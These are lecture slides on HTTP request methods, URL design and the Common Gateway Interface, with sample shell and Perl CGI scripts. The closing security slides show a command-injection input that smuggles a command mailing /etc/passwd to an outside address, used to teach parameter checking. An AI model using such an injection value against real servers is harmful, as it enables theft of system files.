Multimedia Information Systems VO/KU (706.052/706.053)
HTTP and URLs
Denis Helic
IICM, TU Graz
Server-side Technologies: Historical Background (1)
- Server-side = Web server side
- At the beginning the Web was a static information system
- Web servers served documents, images, etc.
- Static information stored on the server side (file system)
- No interaction between users and the Web (except browsing)
Server-side Technologies: Historical Background (2)
- There was a need for more interaction between users and the system (e.g. phone books)
- HTML forms
- Server needed to respond differently depending on values submitted by users
- Dynamic response by server
Server-side Technologies: Historical Background (3)
- Need to extend the functionality of Web servers
- Don't add the new functionality into Web servers directlys
- Just allow Web servers to communicate with external programs
- External programs generate dynamic content depending on values submitted by HTML form
- Dynamic content forwarded to Web server
- Web server responds with dynamic content
Server-side Technologies: Today
- More than just evaluating of HTML forms
- Dynamic content needed for different purposes
- Sophisticated user interaction (e.g. search engines, shopping carts)
- Content changes often (e.g. weather forecast, news headlines)
- Web gateways to database-based applications (e.g. prices of products, online ticket reservations)
HTTP (1)
- Original intention to retrieve and publish hypertext documents
- Development coordinated by W3C
- HTTP is a request/response protocol between a user-agent and a server
- It is a connectionless protocol
- The connection is closed by the server after the response is sent
HTTP (2)
- Between a user-agent and a server there can be intermediaries
- Proxies: a server that forwards request from user-agents to other servers
- Gateways (reverse proxies): a server that is an entry point to a number of servers
- Tunnels: carries http messages within another protocol, e.g. a secure protocol
HTTP (3)
- A server serves a number of Web resources, e.g. HTML pages, images
- Each resource is uniquely addressable by its URL (URI)
- http://coronet.iicm.edu/lectures/mmis/
- HTTP 1.1
HTTP Request Message
- Request line, e.g. GET /lectures/mmis/ HTTP/1.1
- Headers such as: Host, Accept-Language, ...
- An empty line
- Optionally message body
HTTP Request Methods (1)
- As of HTTP 1.1: 8 request methods
- HEAD: asks for response identical to GET but without message body
- To retrieve meta-information on the resource
- GET: request for a representation of a resource
- Representation in a particular media format: text/html, image/png, ...
- Should not have side-effects: common misuse for actions in Web applications
HTTP Request Methods (2)
- POST: submits data to the server for processing by a specified resource (e.g. HTML forms)
- Data included and encoded in the message body
- PUT: uploads a representation of a specific resource
- Data in the message body
HTTP Request Methods (3)
- DELETE: deletes a specified resource
- TRACE: echoes the request to see the intermediaries
- OPTIONS: Retrieves methods supported by the server
- CONNECT: Converts the connection to a tunnel typically to facilitate SSL communication (https)
HTTP Safe Methods
- HEAD, GET, OPTIONS, and TRACE are defined as safe
- These methods should not have side-effects
- They should not change the state of resources on a server
- However, very often GET misused to e.g. delete a database record on a server
- POST, PUT, DELETE change the reosurces state
HTTP Idempotent Methods
- Multiple indentical requests must have the same result
- GET, HEAD, PUT, DELETE are idempotent
- Need to define them idempotent because of network problems
- Misusing GET for changing the state violates idempotance definition
HTTP Headers

HTTP Response (1)
- The first line of response is the status code
- Headers (secondary for handling response)
- Message body (representation of a resopurce)
HTTP Response (2)

HTTP Request/Response: Example (1)
telnet coronet.iicm.edu 80
Trying 129.27.200.61...
Connected to coronet.iicm.edu (129.27.200.61).
Escape character is '^]'.
GET / HTTP/1.1
Host: coronet.iicm.tugraz.at
HTTP Request/Response: Example (2)
HTTP/1.1 200 OK
ETag: W/"413-1160316312000"
Last-Modified: Sun, 08 Oct 2006 14:05:12 GMT
Content-Type: text/html
Content-Length: 413
Date: Mon, 12 Nov 2007 11:08:09 GMT
Server: Apache-Coyote/1.1
<html>
...
HTTP Request/Response: Example (3)
curl -x proxy.iicm.edu:3128 http://coronet.iicm.tugraz.at
-i -X TRACE
HTTP/1.0 200 OK
Content-Type: message/http
Content-Length: 322
Date: Mon, 12 Nov 2007 11:10:37 GMT
Server: Apache-Coyote/1.1
X-Cache: MISS from gk01.iicm.tugraz.at
X-Cache-Lookup: NONE from gk01.iicm.tugraz.at:3128
Proxy-Connection: keep-alive
HTTP Request/Response: Example (4)
TRACE / HTTP/1.0
user-agent: curl/7.16.4 (i486-pc-linux-gnu) libcurl/7.16.4 OpenSSL/0.9.8e zlib/1.2.3.3 libidn/1.0
host: coronet.iicm.tugraz.at
pragma: no-cache
accept: */*
via: 1.1 gk01.iicm.tugraz.at:3128 (squid/2.5.STABLE14)
x-forwarded-for: 129.27.153.250
cache-control: max-age=259200
connection: keep-alive
HTTP Request/Response: Example (5)
curl -x proxy.iicm.edu:3128 http://coronet.iicm.tugraz.at
-i -X OPTIONS
HTTP/1.0 200 OK
Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
Content-Length: 0
Date: Mon, 12 Nov 2007 11:12:26 GMT
Server: Apache-Coyote/1.1
X-Cache: MISS from gk01.iicm.tugraz.at
X-Cache-Lookup: MISS from gk01.iicm.tugraz.at:3128
Proxy-Connection: keep-alive
URLs (1)
- URL is the address of a resource
- The core concept of the Web
- URL interconnect all the resources into the Web
- The Web succeeded becuase of this addressability
URLs (2)
- People will use URLs
- To make links, recollect also Google
- URLs should be descriptive
- http://www.example.com/software/releases/1.0.3.tar.gz
- As opposed to: http://www.dinf.tugraz.at/index.php?id=122 (Masterprüfungen)
URLs (3)
- URLs should have a structure
- /search/Jellyfish and /i-want-to-know-about/Mice
- Choose one of these and be consistent
- Impose a structure as e.g. in a file system
- As opposed to: http://www.dinf.tugraz.at/index.php?id=122 (Masterprüfungen)
Communication between Web server and external programs
- How should Web server communicate with external programs?
- Passing parameters, getting response, etc.
- Standardized communication mechanism
- Standard created by Web consortium
Common Gateway Interface (CGI)
- CGI is a specification of communication between Web server and external programs
- Current version CGI 1.1: http://hoohoo.ncsa.uiuc.edu/cgi/interface.html
- Very general approach, can be applied for different applications
- Not only HTML form evaluation
- Web server must implement CGI specification
- All major Web servers do! (e.g. Apache, IIS, etc.)
CGI Specification (1)
- Environment variables
- System specific variables set by Web server
- External program reads environment variables and obtains data about client request
- CONTENT_LENGTH, CONTENT_TYPE, REMOTE_ADDR, REMOTE_HOST, etc.
CGI Specification (2)
- Command line
- Using a special HTML tag user sends a command line to the server
- Command line executed on the server
CGI Specification (3)
- Standard Input
- Used by the server to send client data to external program
- Standard Output
- Used by external program to send response to the server (write HTML to standard output)
CGI Specification (4)
- HTTP method used by the client: GET or POST
- GET method: external program reads environment variables
- QUERY_STRING special environment variable containing data submitted by user (e.g. HTML form data)
- POST method: external program reads from standard input
- External program needs to parse the input
CGI Specification (5)
- CGI specification allows external programs to be written in any programming language
- UNIX shell scripts, Perl scripts, C programs, C++ programs
- Even PHP as CGI or Java as CGI
CGI Examples (2)
#!/bin/sh
# send http-header and a newline afterwards:
echo "Content-Type: text/html"
echo ""
CGI Examples (3)
# send html content:
echo "<HTML>"
echo " <HEAD>"
echo " <TITLE>Hello World CGI</TITLE>"
echo " </HEAD>"
echo " <BODY>"
echo " Hello World ("
date "+%T, %d.%m.%Y"
echo ")"
echo " </BODY>"
echo "</HTML>"
CGI Examples (5)
#!/usr/bin/perl
require "cgi-lib.pl";
print &PrintHeader;
print "<hr>";
print &PrintEnv;
CGI Examples (6)
- Special CGI library in Perl: cgi-lib
- Provides functions for parsing input, parsing parameters, writing headers, etc.
- Cgi-lib homepage: http://cgi-lib.berkeley.edu/
CGI Examples (9)
#!/usr/bin/perl
require "cgi-lib.pl";
if (&ReadParse) {
print &PrintHeader, &PrintVariables;
} else {
print &PrintHeader,'<form><input type="submit">
Data: <input name="myfield">';
}
CGI Applications (1)
- Long list of different applications
- Simple: Hit counters, current date, etc.
- Handling HTML forms, search engines, imagemaps, databases
- WWW gateways!
CGI Security (1)
- Check parameters carefully!!!
if($email =~ /[^a-zA-Z0-9_\-\.@]/){
$_ = "The email address should be of
the form <i>user\@server</i>!";
}else{
$_ = qx($finger $email);
}
CGI Security (2)
- Suppose this e-mail address: something ; mail bad@address.com < /etc/passwd
- Basically you let other people start programs on the server
- Check what they want to do on your server!!!
- Not only CGI! (PHP, Java Servlets, etc.)